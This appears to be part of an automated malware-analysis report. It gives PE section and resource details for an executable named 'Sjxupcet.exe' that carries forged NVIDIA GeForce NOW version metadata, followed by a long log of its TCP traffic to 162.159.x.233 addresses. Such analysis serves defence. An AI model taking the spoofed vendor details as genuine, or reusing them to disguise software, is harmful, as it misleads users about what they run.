                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x42740x4400False0.556353400735data5.90235211148IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x80000x1ebc0x2000False0.310180664062data3.41463467052IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xa0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountry
                                                  RT_ICON0x81600xea8data
                                                  RT_ICON0x90080x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                                  RT_GROUP_ICON0x98b00x22data
                                                  RT_VERSION0x98d40x3fcdata
                                                  RT_MANIFEST0x9cd00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                  DLLImport
                                                  mscoree.dll_CorExeMain
                                                  DescriptionData
                                                  Translation0x0000 0x04b0
                                                  LegalCopyright(c) 2017-2021 NVIDIA Corporation. All rights reserved.
                                                  Assembly Version92.4515.159.1
                                                  InternalNameSjxupcet.exe
                                                  FileVersion92.4515.159.1
                                                  CompanyNameNVIDIA Corporation
                                                  LegalTrademarks
                                                  CommentsNVIDIA GeForce NOW
                                                  ProductNameNVIDIA GeForce NOW
                                                  ProductVersion92.4515.159.1
                                                  FileDescriptionNVIDIA GeForce NOW
                                                  OriginalFilenameSjxupcet.exe
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 23, 2022 08:13:00.617306948 CEST4971580192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:00.633255959 CEST8049715162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:00.633433104 CEST4971580192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:00.634634972 CEST4971580192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:00.650362968 CEST8049715162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:00.657365084 CEST8049715162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:00.706048965 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:00.706140041 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:00.706254959 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:00.709229946 CEST4971580192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:00.750592947 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:00.750627995 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:00.796664000 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:00.796793938 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:00.812541962 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:00.812582016 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:00.812937021 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:00.865513086 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.434573889 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.478188038 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.486388922 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.486485958 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.486540079 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.486576080 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.486612082 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.486618042 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.486650944 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.486660957 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.486695051 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.486726046 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.486732960 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.486763000 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.486795902 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.486798048 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.486813068 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.486848116 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.486872911 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.486915112 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.486949921 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.486974955 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.486984015 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487008095 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.487013102 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487051964 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487076998 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.487085104 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487114906 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487144947 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.487149000 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487162113 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487211943 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.487219095 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487251043 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487265110 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.487273932 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487319946 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.487323999 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487334967 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487387896 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.487396002 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487431049 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487499952 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487535000 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487539053 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.487546921 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487577915 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.487591982 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487638950 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.487643003 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487740040 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487821102 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487848997 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.487858057 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487915039 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487940073 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.487946987 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.487986088 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.488019943 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.488028049 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.488043070 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.488095999 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.488102913 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.488205910 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.504441977 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.504581928 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.504785061 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.504955053 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.505021095 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.505038977 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.505070925 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.505110979 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.505120993 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.505148888 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.505201101 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.505270958 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.505278111 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.505314112 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.505323887 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.505346060 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.505400896 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.505456924 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.505526066 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.505578995 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.505639076 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.505683899 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.505744934 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.505790949 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.505848885 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.505892992 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.505951881 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.506000042 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.506062984 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.506094933 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.506185055 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.506237030 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.506308079 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.506341934 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.506406069 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.506441116 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.506510973 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.506525040 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.506552935 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.506592989 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.506607056 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.520457983 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.520548105 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.520653009 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.520678997 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.520761013 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.520765066 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.522608042 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.522718906 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.522799015 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.522869110 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.522878885 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.522906065 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.522984982 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.523060083 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.523072004 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.523184061 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.523262024 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.523339987 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.523351908 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.523360014 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.523428917 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.523654938 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.523736954 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.523744106 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.523757935 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.523839951 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.523909092 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.523988962 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.523988962 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.524008036 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.524061918 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.524167061 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.524252892 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.524257898 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.524276018 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.524339914 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.524451017 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.524529934 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.524538040 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.524549007 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.524621010 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.524635077 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.524710894 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.524728060 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.524734974 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.524816036 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.524878025 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.524951935 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.525024891 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.525029898 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.525101900 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.525125027 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.525194883 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.525480032 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.525535107 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.525571108 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.525578022 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.525613070 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.525620937 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.525686979 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.525755882 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.526109934 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.526151896 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.526210070 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.526221037 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.526285887 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.526415110 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.526462078 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.526500940 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.526510954 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.526561022 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.526920080 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.526958942 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.527010918 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.527019978 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.527096987 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.527384996 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.527431011 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.527467966 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.527477026 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.527554035 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.527801991 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.527842045 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.527889013 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.527896881 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.527956963 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.528264046 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.528336048 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.528386116 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.528394938 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.528470039 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.529541016 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.529812098 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.546611071 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.546669960 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.546719074 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.546741009 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.546770096 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.546798944 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.546837091 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.546875954 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.546883106 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.546907902 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.546941042 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.546998978 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.547035933 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.547044039 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.547055960 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.547074080 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.547116995 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.547128916 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.547136068 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.547163963 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.547198057 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.547230005 CEST44349716162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:13:01.547272921 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:13:01.550574064 CEST49716443192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:14:26.235841990 CEST4971580192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:14:38.034760952 CEST4972080192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:38.052618027 CEST8049720162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:38.052730083 CEST4972080192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:38.053694010 CEST4972080192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:38.069406033 CEST8049720162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:38.077887058 CEST8049720162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:14:38.171360016 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:38.171401978 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:38.171478987 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:38.187056065 CEST4972080192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:14:38.210199118 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:38.210227013 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:38.245620966 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:38.245759010 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:38.254825115 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:38.255388021 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:38.310194016 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:45.479038000 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:45.513948917 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514076948 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514122009 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514187098 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514228106 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:45.514236927 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514240026 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:45.514252901 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514301062 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:45.514312983 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514379025 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514403105 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514462948 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514512062 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:45.514513016 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514514923 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:45.514527082 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514611959 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514661074 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514708042 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514756918 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514766932 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:45.514775991 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514786959 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:45.514831066 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514873981 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514879942 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:45.514883995 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:45.514888048 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.514959097 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.515007019 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.515048027 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.515091896 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:45.515100002 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.515113115 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.515144110 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:45.515178919 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.515213013 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.515248060 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.515258074 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:45.515266895 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.515275955 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:45.515299082 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:45.515309095 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.515347958 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.515393019 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.515434027 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.515471935 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.515484095 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:45.515490055 CEST44349721162.159.130.233192.168.2.6
                                                  Apr 23, 2022 08:14:45.515496969 CEST49721443192.168.2.6162.159.130.233
                                                  Apr 23, 2022 08:14:45.515533924 CEST44349721162.159.130.233192.168.2.6
